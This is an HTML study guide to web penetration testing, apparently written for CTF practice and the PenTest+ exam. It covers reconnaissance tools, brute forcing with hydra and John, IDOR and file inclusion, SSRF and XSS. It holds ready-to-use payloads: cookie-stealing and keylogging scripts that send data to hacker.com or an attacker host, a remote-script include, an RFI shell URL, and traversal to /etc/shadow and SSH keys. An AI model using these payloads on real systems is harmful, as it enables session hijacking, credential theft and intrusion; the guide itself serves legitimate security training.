<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta name="description" content="" />
        <meta name="author" content="" />
        <title>Sourced - Penetration Testing</title>
        <link rel="icon" type="image/x-icon" href="assets/img/favicon.ico" />
        
        <!-- Font Awesome icons (free version)-->
        <script src="https://use.fontawesome.com/releases/v6.1.0/js/all.js" crossorigin="anonymous"></script>
        
        <!-- Google fonts-->
        <link href="https://fonts.googleapis.com/css?family=Saira+Extra+Condensed:500,700" rel="stylesheet" type="text/css" />
        <link href="https://fonts.googleapis.com/css?family=Muli:400,400i,800,800i" rel="stylesheet" type="text/css" />
        
        <!-- Core theme CSS (includes Bootstrap)-->
        <link href="css/styles.css" rel="stylesheet" />
    </head>
    <body id="page-top">
        
        <!-- Navigation-->
        <nav class="navbar navbar-expand-lg navbar-dark bg-primary fixed-top" id="sideNav">
            <a class="navbar-brand js-scroll-trigger" href="#page-top">
                <span class="d-none d-lg-block"><img class="img-fluid img-profile rounded-circle mx-auto mb-2" src="assets/img/profile.png" /></span>
            </a>
            <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation"><span class="navbar-toggler-icon"></span></button>
            <div class="collapse navbar-collapse" id="navbarResponsive">
                <ul class="navbar-nav">
                    <li class="nav-item"><a class="nav-link js-scroll-trigger" href="#about">About</a></li>
                    <li class="nav-item"><a class="nav-link js-scroll-trigger" href="#overview">Overview</a></li>
                    <li class="nav-item"><a class="nav-link js-scroll-trigger" href="#osint">OSINT & Information Gathering</a></li>
                    <li class="nav-item"><a class="nav-link js-scroll-trigger" href="#scanning">Scanning</a></li>
                    <li class="nav-item"><a class="nav-link js-scroll-trigger" href="#enumeration">Enumeration</a></li>
                    <li class="nav-item"><a class="nav-link js-scroll-trigger" href="#exploitation">Exploitation</a></li>
                </ul>
            </div>
        </nav>
        
        <!-- Page Content-->
        <div class="container-fluid p-0">

            <!-- About-->
            <section class="document-section" id="about">
                <div class="document-section-content">
                    <h1 class="mb-0">
                        Introduction to Penetration Testing on 
                        <span class="text-primary">Web & Web Apps</span>
                    </h1>
                    <div class="subheading mb-5">
                        Arian Valaei
                    </div>
                    <p class="lead mb-5">This document is designed to have a general overview of top vulnerabilities on Web,
                        and contains common industry standard tools and techniques for the purpose of penetration testing and can be quite 
                        useful for CTF contest or for CompTIA PenTest+ exam. Significant parts of this document are gathered from TryHackMe modules, OWASP, PortSwigger, GeeksForGeeks, Medium and other valuable open-source resources. 
                    </p>
                    <div class="social-icons">
                        <a class="social-icon" href="https://www.linkedin.com/in/arianvalaei/"><i class="fab fa-linkedin-in"></i></a>
                        <a class="social-icon" href="https://gitlab.com/valaei"><i class="fab fa-gitlab"></i></a>
                    </div>
                </div>
            </section>
            <hr class="m-0" />

            <!-- Overview -->
            <section class="document-section" id="overview">
                <div class="document-section-content">
                    <h2 class="mb-5">Overview</h2>
                    <p class="lead">Regardless of the attack surface, we can divide our penetration testing steps into the following sub-steps:</p>
                    <ol>
                        <li>Information Gathering (OSINT, Research)</li>
                        <li>Enumeration & Scanning</li>
                        <li>Exploitation</li>
                        <li>Privilege Escalation (Horizontally, Vertically)</li>
                        <li>Post Exploitation</li>
                    </ol><br>
                    <p class="lead">Below is a table containing quick links to the vulnerabilities and tools covered in this document:</p></br>
                    <dl class="row">
                        <dt class="col-sm-4">Open Source Intelligence</dt>
                        <dd class="col-sm-8">
                            <a class="nav-link js-scroll-trigger" href="#osint-tools">Tools & Links</a>
                        </dd>

                        <dt class="col-sm-4">Scanning</dt>
                        <dd class="col-sm-8">
                            <a class="nav-link js-scroll-trigger" href="#developer-tools">Browser & Developer Tools</a>
                            <a class="nav-link js-scroll-trigger" href="#nmap">Nmap</a>
                            <a class="nav-link js-scroll-trigger" href="#wpscan">WPScan</a>
                            <a class="nav-link js-scroll-trigger" href="#nikto">Nikto</a>
                        </dd>

                        <dt class="col-sm-4">Enumeration</dt>
                        <dd class="col-sm-8">
                            <a class="nav-link js-scroll-trigger" href="#gobuster">Gobuster</a>
                            <a class="nav-link js-scroll-trigger" href="#ffuf">FFUF</a>
                            <a class="nav-link js-scroll-trigger" href="#dirb">DIRB</a>
                            <a class="nav-link js-scroll-trigger" href="#sublist3r">Sublist3r</a>
                        </dd>

                        <dt class="col-sm-4">Exploitation</dt>
                        <dd class="col-sm-8">
                            <a class="nav-link js-scroll-trigger" href="#auth-bypass">Authentication Bypass</a>
                            <a class="nav-link js-scroll-trigger" href="#brute-force">Brute Force Attacks (Hydra, John, Rainbow Crack)</a>
                            <a class="nav-link js-scroll-trigger" href="#idor">Insecure Direct Object Reference (IDOR)</a>
                            <a class="nav-link js-scroll-trigger" href="#ssrf">Server-side request forgery (SSRF)</a>
                            <a class="nav-link js-scroll-trigger" href="#xss">Cross-site Scripting (XSS)</a>
                            <a class="nav-link js-scroll-trigger" href="#rce">Remote Code Execution (RCE)</a>
                            <a class="nav-link js-scroll-trigger" href="#sqli">SQL Injection (SQLi)</a>
                            <a class="nav-link js-scroll-trigger" href="#xxe">XML External Entity (XXE)</a>
                            <a class="nav-link js-scroll-trigger" href="#upload-vulnerabilities">Upload Vulnerabilities</a>
                        </dd>
                    </dl>
                </div>
            </section>
            <hr class="m-0" />

            <!-- OSINT & Information Gathering -->
            <section class="document-section" id="osint">
                <div class="document-section-content">
                    <h2 class="mb-5">OSINT & Information Gathering</h2>
                    <h3 class="mb-3" id="osint-tools">Tools & Links</h2>
                        <ul>
                            <li>Use <a href="http://www.wappalyzer.com/">Wappalyzer</a> to find out about yout target tech stack, framework, and technologies in use. You can also install the Wappalyzer extension on your browser.</li><br>
                            <li> Take advantage of the Google advanced search by utilizing Google Dorking / hacking operators. (Site: inurl: filetype: intitle:)</li><br>
                            <li><a href="https://archive.org/web/">Archive.org</a> is a web scraper and has content since '90s. You might find old web pages of your target here.</li><br>
                            <li><a href="https://www.whois.com/whois">Whois</a> gives you information about domain registration, name servers, IP addresses,...</li><br>
                            <li><a href="https://www.exploit-db.com/">Exploit DB</a> is a very useful database for vulnerability research. You can also use SearchSploit command line tool to search the exploit db.</li><br>
                            <li><a href="https://attackerkb.com/">AttackerKB</a> is another useful Exploit database. You can also use <a href="https://github.com/horshark/akb-explorer">AKB Explorer</a> command line tool to query Attacker KB.</li><br>
                            <li><a href="https://www.cvedetails.com/">CVE Details</a> and <a href="https://cve.mitre.org/">CVE Mitre</a> are perfect data sources to search for Common Vulnerabilities and Exposures.</li><br>
                            <li>If you find a CVE or an exploit don't forget to check if it's already included in the powerful <a href="https://www.metasploit.com/">Metasploit</a> framework.</li><br>
                            <li><a href="https://osintframework.com/">OSINT Framework</a> presents you with a huge tree of potential data sources that you can explore.</li><br>
                            <li><a href="https://tineye.com/">TinEye</a> is a reverse image search engine.</li><br>
                            <li><a href="https://namechk.com/">Namechk</a> takes your username and checks its availability as a domain name and username on dozens of social channels and online platforms.</li><br>
                            <li><a href="https://github.com/lanmaster53/recon-ng">Recon-Ng</a> is another free and open-source OSINT command line tool used for reconnaissance of the target. It comes with a lot of useful modules and marketplace for add-ons.</li><br>
                            <li><a href="https://github.com/danielmiessler/SecLists">SecLists</a> and <a href="https://github.com/3ndG4me/KaliLists">KaliLists</a> are useful wordlists that come with Kali Linux.</li>
                        </ul>
                </div>
            </section>
            <hr class="m-0" />

            <!-- Scanning -->
            <section class="document-section" id="scanning">
                <div class="document-section-content">
                    <h2 class="mb-5">Scanning</h2>
                    <h3 class="mb-3" id="developer-tools">Browser & Developer Tools</h3>
                    <p>Useful Tips:</p>
                    <uL>
                        <li>Make a list of the paths and directories. (Can use <code>Burp Suit</code> instead)</li>
                        <li>Check the source code for JS logic, AJAX requests, API calls & comments &lt;!-- --&gt;. (Minified or obfuscated code is reversible)</li>
                        <li>Look for links for example &lt;a href="/assets/image1"&gt;. In this case, try accessing the assets directory, which should give you 403 forbidden. 
                            Otherwise, disable the directory listing on your web server.  It happens when there exists no indicated file for the webserver to fetch, like index.html or index.php.</li>
                        <li>Always try default credentials on the admin page. The following credentials list could be helpful:<br>
                            <code>/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt</code>
                        </li>
                        <li>Use the Inspector to edit and manipulate your page's HTML, CSS, JS. (Burp Suit comes in handy too)</li>
                        <li>Use the Debugger (For Safari, Firefox, and Sources for Chrome) to interact with js code. You can use breakpoints to pause execution.</li>
                        <li>Use the Network tab to find clues on HTTP headers, cookies, AJAX requests, APIs, request and response payloads.</li>
                        <li>Use the Application tab to add, edit or delete cookies.</li>
                        <li>Check robots.txt: A file that tells the search engine which pages are or are not allowed to be shown in the results.</li>
                        <li>Check sitemap.xml: Unlike robots.txt, it has content to be discovered by search engines.</li>
                        <li>Check Favicon: If not changed sometimes can reveal the framework logo. Download the Favicon and then use md5sum to get MD5 hash and check it on OWASP icon db <a href="https://wiki.owasp.org/index.php/OWASP_favicon_database ">here</a>:<br>
                            <code>curl &lt;FAVICON_URL&gt; | md5sum</code>
                        </li>
                        <li>Check the HTTP header for the webserver version and also the backend code language and version. You can use cURL with verbose mode:<br>
                            <code>curl &lt;TARGET_URL&gt; -v</code>
                        </li>
                        <li><a href="https://www.tenable.com/products/nessus">Nessus</a> is an open source network vulnerability scanner that might comes handy. You can run Nessus dashboard on your browser.</li>
                    </uL><br>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="nmap">Nmap</h3>
                    <p>Nmap Scan Types:</p>
                    <uL>
                        <li>TCP Connect Scans (-sT): Receives RST if port closed.</li>
                        <li>SYN "Half-open" Scans (-sS): Sends RST on the third hand-shake.</li>
                        <li>UDP Scans (-sU): Responds with OPEN | FILTERED if it doesn't receive any respond. Otherwise, it receives ICMP (ping) with unreachable message.</li>
                        <li>TCP Null Scans (-sN): TCP request with no flags set. Should receive RST if port is closed.</li>
                        <li>TCP FIN Scans (-sF): TCP request with FIN flag set. Should receive RST if port is closed.</li>
                        <li>TCP Xmas Scans (-sX): TCP request with PSH, URG and FIN flags set. Should receive RST if port is closed.</li>
                        <li>Nmap Ping Sweep (-sn): Send ICMP packet to each host in a network to discover live hosts:<br>
                            <code>nmap -sn 192.168.0.1-254</code><br>
                            <code>nmap -sn 192.168.0.0/24</code></li>
                    </uL>
                    <p>Nmap Scripting Engine (NSE):</p>
                    <ul>
                        <li>Use -sC to run the default script category. (--script=default)</li>
                        <li>Example:<br>
                            <code>nmap -p 80 --script http-put --script-args http-put.url='/dav/shell.php',http-put.file='./shell.php'</code><br>
                            <code>nmap --script-help &lt;script-name&gt;</code>
                        </li>
                        <li>Search NSE database for scripts and their categories:<br>
                            <code>grep "ftp" /usr/share/nmap/scripts/script.db</code>
                        </li>
                        <li>Check the full script list with examples <a href="https://nmap.org/book/nse-usage.html">here</a>.</li>
                    </ul>
                    <p>In most cases the following script is all you need:</p>
                    <code>nmap -sC -sV -O -oN &lt;OUTPUT_FILE&gt; &lt;IP_ADDRESS&gt;</code> (use -p- to scan all ports istead of top 1000)<br><br>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="wpscan">WPScan</h3>
                    <p>Designed for WordPress websites. Enumerates themes, plugins, and users (by simply looking at the authors) and also performs brute-force attacks with wordlists.</p>
                    <ul>
                        <li>Scan and enumerate themes, plugins and users:<br>
                            <code>wpscan --url &lt;TARGET_URL&gt; --enumerate t</code><br>
                            <code>wpscan --url &lt;TARGET_URL&gt; --enumerate p</code><br>
                            <code>wpscan --url &lt;TARGET_URL&gt; --enumerate u</code>
                        </li>
                        <li>Setup WP VulnDB API, and then you can search for vulnerabilities on discovered themes or plugins using the -v option:<br>
                            <code>wpscan --url &lt;TARGET_URL&gt; --enumerate vp</code>
                        </li>
                        <li>Password Attacks (If no username specified, it will do the user enumeration):<br>
                            <code>wpscan –-url &lt;TARGET_URL&gt; –-passwords rockyou.txt –-usernames users.txt</code>
                        </li>
                        <li>Use <code>--plugins-detection aggressive/passive</code> to make it less noisy to become less detectable by the firewalls.</li>
                    </ul>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="nikto">Nikto</h3>
                    <p>Nikto is capable of performing an assessment on all types of web servers. Sensitive files, outdated servers, programs, and also server and software misconfiguration:</p>
                    <ul>
                        <li>Perform basic scan by scanning HTTPS headers using -h. Use -Display for verbose mode:<br>
                            <code>nikto -h &lt;VULNERABLE_IP&gt; -Display v -ssl</code>
                        </li>
                        <li>Scan a subnet using Nmap output:<br>
                            <code>nmap -p 80 172.16.0.0/24 -oG - | nikto -h -</code>
                        </li>
                        <li>Scan multiple ports:<br>
                            <code>nikto -h 10.10.10.1 -p 80, 8000, 8080</code>
                        </li>
                        <li>Using information provided by basic scan, you can use plugins for possible exploit and extend the capabilities of Nikto. Use <code>--list-plugins</code> to see available plugins:<br>
                             <code>nikto -h 10.10.10.1 -Plugin apacheuser/cgi/robots/dir_traversal/...</code>
                        </li>
                    </ul>
                </div>
            </section>
            <hr class="m-0" />

            <!-- Enumeration -->
            <section class="document-section" id="enumeration">
                <div class="document-section-content">
                    <h2 class="mb-5">Enumeration</h2>
                    <h3 class="mb-3" id="gobuster">Gobuster</h3>
                    <p>Gobuster has different modes:</p>
                    <ul>
                        <li>Dir Mode: Directory/File enumeration.</li>
                        <li>DNS Mode: Subdomain enumeration.</li>
                        <li>FUZZ Mode: Replace FUZZ keyword in HTTP URL, header or payload.</li>
                        <li>VHOST mode: Virtual Host enumeration. (You may use IP address as the URL parameter)</li>
                    </ul>
                    <p>Examples:</p>
                    <ul>
                        <li><code>gobuster dir -u &lt;TARGET_URL&gt; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.css,.js,.php </code></li>
                        <li><code>gobuster dns -d geeksforgeeks.org -t 100 -w /usr/share/wordlists/dirb/common.txt -k</code> (Use -k to bypass HTTPS untrusted cert)</li>
                        <li><code>gobuster vhost -u https://example.com -t 50 -w /wordlists/Discovery/DNS/subdomains-top1million-5000.txt</code></li>
                    </ul>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="ffuf">FFUF</h3>
                    <p>FFUF is used for fuzzing HTTP requests. Make sure to use matchers and filters to select specific response status code, size, regex or number of lines. Examples:</p>
                    <ul>
                        <li><code>ffuf -w ./DNS/namelist.txt -H "Host: FUZZ.sourcedgroup.com" -u http://10.10.49.150 -fs 2395</code></li>
                        <li><code>ffuf -w &lt;path-wordlist&gt; -u https://test-url?id=FUZZ</code></li>
                        <li><code>ffuf -w &lt;path-wordlist&gt; -u http://test-url/FUZZ -e .aspx,.php,.txt,.html</code></li>
                        <li><code>ffuf -w &lt;path-wordlist&gt; -u https://test-url -H "X-Header: FUZZ"</code></li>
                    </ul>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="dirb">DIRB</h3>
                    <p>DIRB is a simple directory lister. Use dirb with default or provided wordlist:</p>
                    <ul>
                        <li><code>dirb http://webscantest.com/</code></li>
                        <li><code>dirb http://webscantest.com /usr/share/dirb/wordlists/vulns/apache.txt</code></li>
                    </ul>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="sublist3r">Sublist3r</h3>
                    <p>Sublist3r automatically enumerates using OSINT, search engines and DNS brute-forcing. Download Sublist3r from <a href="https://github.com/aboul3la/Sublist3r">here</a>. Examples:</p>
                    <ul>
                        <li><code>python sublist3r.py -d example.com</code></li>
                        <li><code>python sublist3r.py -b -e google,yahoo,virustotal -d example.com</code></li>
                    </ul>
                </div>
            </section>
            <hr class="m-0" />

            <!-- Exploitation -->
            <section class="document-section" id="exploitation">
                <div class="document-section-content">
                    <h2 class="mb-5">Exploitation</h2>
                    <h3 class="mb-3" id="auth-bypass">Authentication Bypass</h3>
                    <p>Below are some possible approaches for performing authentication bypass:</p>
                    <ul>
                        <li>
                            <p>Enumerate valid usernames from the signup page and then use the user list to perform a brute-force attack:</p>
                            <code>ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"</code><br><br>
                            <code>ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200</code><br><br>
                        </li>
                        <li>
                            <p>$_REQUEST in PHP favors POST form data over GET query parameters. The following PHP pseudocode is exploitable:</p>
                            <code>...</code><br>
                            <code>if $_GET["email"] in user_db:</code><br>
                            <code>&emsp;&emsp;sendMail($_REQUEST["email"]);</code><br>
                            <code>...</code><br><br>
                            <code>curl sourcedgroup.com/reset-password?email=arian%40sourcedgroup.com -H 'Content-Type: application/x-www-form-urlencoded' -d 'email=attacker@hacker.com'</code><br><br>
                        </li>
                        <li>
                            <p>Try cookie tampering. Sometimes you need to encode or hash the value:</p>
                            <code>curl -H "Cookie: logged_in=true; admin=true" http://sourcedgroup.com/home</code><br><br>
                        </li>
                        <li>
                            <p>Test default credentials!</p>
                        </li>
                    </ul><br>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="brute-force">Brute Force Attacks</h3>
                    <h4>THC Hydra</h4>
                    <p>Hydra can bruteforce the following protocols:</p>
                    <code>Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,  HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP</code><br><br>
                    <p>Examples:</p>
                    <ul>
                        <li><code>hydra -l admin -P rockyou.txt ftp://10.10.180.2</code></li>
                        <li><code>hydra -l &lt;username&gt; -P &lt;wordlist&gt; 10.10.180.2 -t 4 ssh</code></li>
                        <li><code>hydra -l &lt;username&gt; -P &lt;wordlist&gt; 10.10.180.2 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V</code></li>
                    </ul><br>
                    <h4>John The Ripper</h4>
                    <p>John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs. You can learn more about John <a href="https://github.com/openwall/john">here</a>.</p>
                    <p>John comes with different modes:</p>
                    <ul>
                        <li>
                            <p><b>Single Mode:</b> It's faster than dictionary mode. For this mode you need a list of colon-separated usernames and hashes:</p>
                            <code>john --single --format=raw-sha1 crack.txt</code><br>
                            <code>unshadow /etc/passwd /etc/shadow > unshadowed</code><br>
                            <code>john unshadowed</code><br>
                            <code>john --show --users=root unshadowed</code><br>
                            <code>john --show --shells="/bin/false" unshadowed</code>
                        </li><br>
                        <li>
                            <p><b>Dictionary Mode:</b> It creates hashes based on the provided dictionary and compares it to the target hash:</p>
                            <code>john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 crack.txt</code><br><br>
                            <p>You can pause John with Ctrl+C and restore it later with:</p>
                            <code>john --restore</code>
                        </li><br>
                        <li>
                            <p><b>Incremental Mode:</b> It is the most powerful mode of John. It tries all the possible character combination:</p>
                            <code>john -i:&lt;Max Chars&gt; passwordfile.txt</code>
                        </li>
                    </ul>      
                    <p>Crack Windows LM/NTLM hashes from the SAM database:</p>
                    <code>john --format=lm crack.txt</code><br><br>
                    <p>John also comes with other handy tools like ssh2john, rar2john, zip2john, ...</p><br>
                    <h4>Rainbow Crack</h4>
                    <p>RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. It crack hashes with rainbow tables and can benefit GPU acceleration with AMD, NVIDIA and multiple GPUs.</p>
                    <p><a href="http://project-rainbowcrack.com/table.htm">Here</a> you can find list of rainbow tables for LM, NTLM, SHA1 and MD5 hash algorithms. It will be useful if there is no salt involved. Examples:</p>
                    <ul>
                        <li>
                            <code>rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index</code><br>
                            <code>sudo rtgen md5 loweralpha-numeric 1 7 0 3800 3 0</code>
                        </li>
                        <li>
                            <code>sudo rtsort /usr/share/rainbowcrack/&lt;RT-TABLE-NAME&gt;</code>
                        </li>
                        <li>
                            <code>rcrack . -h d6ca3fd0c3a3b462ff2b83436dda495e</code>
                        </li>
                        <li>
                            <code>rcrack . -l /home/kali/Desktop/hash.txt</code>
                        </li>
                    </ul><br>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="idor">Insecure Direct Object Reference (IDOR)</h3>
                    <p>It's an access control kind of vulnerability and could be exploitable by taking advantage of unsanitized user input data to access other entities' information. Make sure to check query parameters, post parameters, cookies, request headers, AJAX requests, ...</p>
                    <code>http://sourcedgroup.com/profile?user_id=1000</code><br><br>
                    <h4>File Inclusion</h4>
                    <p>It's an IDOR vulnerability with generally a file as an input. There are different types of File Inclusion vulnerabilities:</p>
                    <ul>
                        <li>
                            <p><b>Directory Traversal:</b> Also known as dot-dot-slash attack, occurs when user input is passed to functions like file_get_contents in PHP. Example:</p>
                            <code>www.sourcedgroup.com/get.php?doc=instructions.pdf --Server--> /var/www/app/docs/instruction.pdf</code>
                            <code>www.sourcedgroup.com/get.php?doc=../../../../etc/passwd --Server--> /etc/passwd</code><br><br>
                            <p>List of useful files on a Linux server:</p>
                            <ul>
                                <li><b>/etc/profile:</b> Loads on login and it's different from user's .profile which loads on a new shell. Contains setup script and export variables.</li>
                                <li><b>/proc/version:</b> Kernel Version.</li>
                                <li><b>/etc/passwd:</b> List of users, services, home directories, shells,...</li>
                                <li><b>/etc/shadow:</b> Users' hashed passwords.</li>
                                <li><b>/root/.bash_history:</b> Root user command history.</li>
                                <li><b>/var/mail/root:</b> Contains emails for the root user.</li>
                                <li><b>/root/.ssh/id_rsa:</b> Root user private key.</li>
                            </ul>
                        </li><br>
                        <li>
                            <b>Local File Inclusion (LFI):</b> Happens due to developers lack of security awareness. It occurs when user input is passed to functions such as include, include_once, require, and require_once in PHP. Note that the similar vulnerability exists in ASP, JSP, Node.js,... .Example:<br><br>
                            <code>www.sourcedgroup.com/index.php?lang=EN.php</code><br><br>
                            <code>&lt;?PHP</code><br>
                            <code>&emsp;&emsp;&emsp;&emsp;include($_GET["lang"]);</code> ---> ?lang=/etc/passwd<br>
                            <code>?&gt;</code><br><br>
                            <code>&lt;?PHP</code><br>
                            <code>&emsp;&emsp;&emsp;&emsp;include("languages/". $_GET['lang']);</code> ---> ?lang=../../../../etc/passwd<br>
                            <code>?&gt;</code><br><br>
                            <code>&lt;?PHP</code><br>
                            <code>&emsp;&emsp;&emsp;&emsp;include("languages/". $_GET['lang'].".php");</code> ---> ?lang=../../../../etc/passwd%00 <br>
                            <code>?&gt;</code><br><br>
                            <p>Note that hex null byte vulnerability is fixed on PHP 5.3.4 and above. Also make sure to read the backend server errors. It's a goos practice to turn off PHP errors.</p>
                        </li>
                        <li>
                            <b>Remote File Inclusion (RFI):</b> <p>It occurs when user input is passed to functions like include and contains an external URL. <code>allow_url_fopen / allow_url_include</code> should set to on in php.ini file to exploit this vulnerability. Example:</p>
                            <code>www.sourcedgroup.com/index.php?lang=EN.php</code> ---> ?lang=http://www.attacker.com/shell.txt <br><br>
                        </li>
                    </ul>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="ssrf">Server-side request forgery (SSRF)</h3>
                    <p>It's a vulnerability that allows the attacker to make additional or edited HTTP request from the webserver to a third party server. Examples:</p>
                    <div class="table-responsive">
                        <table class="table align-middle">
                          <thead>
                            <tr>
                              <td><b>Expected Request</b></td>
                              <td><b>Attacker Request</b></td>
                              <td><b>Webserver Request</b></td>
                            </tr>
                          </thead>
                          <tbody>
                            <tr>
                                <td>http://www.sourcedgroup.com/client?url=<code>http://api.sourcedgroup.com/api/client/reference?id=123</code></td>
                                <td>http://www.sourcedgroup.com/client?url=<code>http://api.sourcedgroup.com/api/user</code></td>
                                <td><code>http://api.sourcedgroup.com/api/user</code></td>
                            </tr>
                                <td>http://www.sourcedgroup.com/client?url=<code>/reference?id=123</code></td>
                                <td>http://www.sourcedgroup.com/client?url=<code>../user</code></td>
                                <td>http://api.sourcedgroup.com/api/client/<code>../user</code></td>
                            </tr>
                            <tr>
                                <td>http://www.sourcedgroup.com/client?server=<code>api</code>&id=<code>123</code></td>
                                <td>http://www.sourcedgroup.com/client?server=<code>api.sourcedgroup.com/api/user&x=</code>&id=<code>123</code></td>
                                <td>http://<code>api.sourcedgroup.com/api/user?x=</code>.sourcedgroup.com/api/client/reference?id=<code>123</code></td>
                            </tr>
                            <tr>
                                <td>http://www.sourcedgroup.com/client?url=<code>http://api.sourcedgroup.com/api/client/reference?id=123</code></td>
                                <td>http://www.sourcedgroup.com/client?url=<code>http://hacker.com</code></td>
                                <td><code>http://hacker.com</code></td>
                            </tr>
                          </tbody>
                        </table>
                    </div><br><br>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="xss">Cross-site Scripting (XSS)</h3>
                    <p>XSS happens when an attacker injects and executes malicious JavaScript payload on the victim's browser. XSS happens in various ways:</p>
                    <ul>
                        <li>
                            <b>Reflected XSS:</b> Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation. Example:<br><br>
                            https://insecure-website.com/status?message=<code>All+is+well.</code><br>
                            <u>Response:</u> &lt;p&gt;Status: <code>All is well.</code>&lt;/p&gt;<br><br>
                            https://insecure-website.com/status?message=<code>&lt;script&gt;alert("Reflected XSS Exists!");&lt;/script&gt;</code><br>
                            <u>Response:</u> &lt;p&gt;Status: <code>&lt;script&gt;alert("Reflected XSS Exists!");&lt;/script&gt;</code>&lt;/p&gt;
                        </li><br>
                        <li>
                            <b>Stored XSS:</b> Stored XSS happens when the attacker injects an XSS payload into the database. For example, a vulnerable comment section is a potential surface to inject an XSS payload, which might be reviewed by the other users or admins later. (Blind XSS in case it's not visible to the attacker)<br><br>
                        </li>
                        <li>
                            <b>DOM Based XSS:</b> DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. Look for vulnerable variables and methods such as <code> window.location</code> and <code>eval()</code>. Example:<br><br>
                            http://www.some.site/page.html?default=<code>French</code><br><br>
                            <code>Select your language:</code><br><br>
                            <code>&lt;select&gt;&lt;script&gt;</code><br><br>
                            <code>document.write("&lt;OPTION value=1&gt;" + decodeURIComponent(document.location.href.substring(document.location.href.indexOf("default=")+8))+"&lt;/OPTION&gt;");</code><br><br>
                            <code>document.write("&lt;OPTION value=2&gt;English&lt;/OPTION&gt;");</code><br><br>
                            <code>&lt;/select&gt;&lt;/script&gt;</code><br><br>
                            http://www.some.site/page.html?default=<code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code><br><br>
                        </li>
                    </ul>
                    <p>Here's a list of useful payloads:</p>
                    <ul>
                        <li>
                            Proof of conscept:<br>
                            <code>&lt;script&gt;alert('XSS');&lt;/script&gt;</code>
                        </li><br>
                        <li>
                            Session stealing:<br>
                            <code>&lt;script&gt;fetch('https://{ATTACKER_URL_OR_IP}:{PORT_NUMBER}?cookie=' + btoa(document.cookie));&lt;/script&gt;</code><br>
                            On the attacker machine:<br>
                            <code>nc -nvlp {PORT_NUMBER}</code>
                        </li><br>
                        <li>
                            Key logger:<br>
                            <code>&lt;script&gt;document.onkeypress = function(e) { fetch('https://hacker.com/log?key=' + btoa(e.key)); }&lt;/script&gt;</code>
                        </li><br>
                        <li>
                            Fetch the script from elsewhere:<br>
                            <code>&lt;script src="https://hacker.com/evil.js"&gt;&lt;/script&gt;</code>
                        </li><br>
                        <li>
                            Sometimes you need to investigate how XSS is reflected on the web page. Consider the following example where JS is embedded into a textarea input:<br>
                            <code>&lt;div class="text-center"&gt;</code><br>
                            <code>&emsp;&emsp;&emsp;&emsp;&lt;h2&gt;Hello, &lt;textarea&gt;<u>Arian</u>&lt;/textarea&gt;&lt;/h2&gt;</code><br>
                            <code>&lt;/div&gt;</code><br><br>
                            Inject: <code>&lt;/textarea&gt;&lt;script&gt;alert('hi');&lt;/script&gt;</code>
                        </li><br>
                        <li>
                            Sometimes iframe might work:<br>
                            <code>&lt;iframe src="javascript:alert(`xss`)"&gt;&lt;/iframe&gt;</code>
                        </li><br>
                        <li>
                            An XSS polyglot is a string of text which can escape attributes, tags, and bypass filters all in one:<br>
                            <code>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert('THM')//&gt;\x3e</code>
                        </li>
                    </ul><br>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="rce">Remote Code Execution (RCE)</h3>
                    <p>Also known as command injection, refers to running arbitrary script on the victim's OS by acquiring the app privilege level which is running on the device. Command injection feedback can be active or blind:</p>
                    <ul>
                        <li><b>Verbose (Active) Command Injection:</b> Happens when the result output is shown on the webpage. For the proof of concept you can basically use whoami.</li><br>
                        <li><b>Blind Command Injection:</b> No direct output. For the proof of concept use sleep or ping on a Linux server or timeout on a Windows machine.</li>
                    </ul>
